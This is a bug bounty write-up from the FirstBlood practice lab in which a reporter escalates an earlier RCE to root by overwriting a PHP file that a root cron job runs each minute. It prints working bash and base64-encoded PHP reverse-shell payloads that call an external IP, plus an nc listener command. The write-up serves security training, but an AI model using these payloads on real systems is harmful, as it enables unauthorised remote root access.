FirstBlood-#692Becoming a root on the server
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-27, panya Level 7 reported:

As I reported in https://www.bugbountyhunter.com/hackevents/report?id=475 the site contains an insecure deserialization vulnerability which leads to RCE.

After I exploited it and popped a reverse shell with this payload:

/bin/bash -c 'bash -i >& /dev/tcp/157.230.125.192/1234 0>&1'

I noticed that the current user is fb-exec (non-privileged).

After navigating through the file system and reading files, I found file scheduler.php with this comment:

/*
Tell Raymond on the server team to turn off the crontab until we need it
-Patrice
*/

I checked cron jobs and found this one (in the /etc/cron.d/firstblood file):

* * * * * root cd /app/firstblood && php scheduler.php >> /dev/null 2>&1

So this scheduler.php file is executed via php by the root user every minute.

And fb-exec user can write to this file.

So to become the root of this server, we can write another reverse shell payload to this file:

echo PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTU3LjIzMC4xMjUuMTkyLzEyMzQgMD4mMSciKTsgPz4= | base64 -d > scheduler.php

where PD9waHAgc3lzdGVtKCIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTU3LjIzMC4xMjUuMTkyLzEyMzQgMD4mMSciKTsgPz4= is our base64 encoded php reverse shell code:

<?php system("/bin/bash -c 'bash -i >& /dev/tcp/157.230.125.192/1234 0>&1'"); ?>

And after running nc -nvlp 1234 on my server (157.230.125.192) and waiting a bit, I got the root shell:

id
uid=0(root) gid=0(root) groups=0(root)

P1 CRITICAL

Parameter:

Payload:


FirstBlood ID: 35
Vulnerability Type: RCE

A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.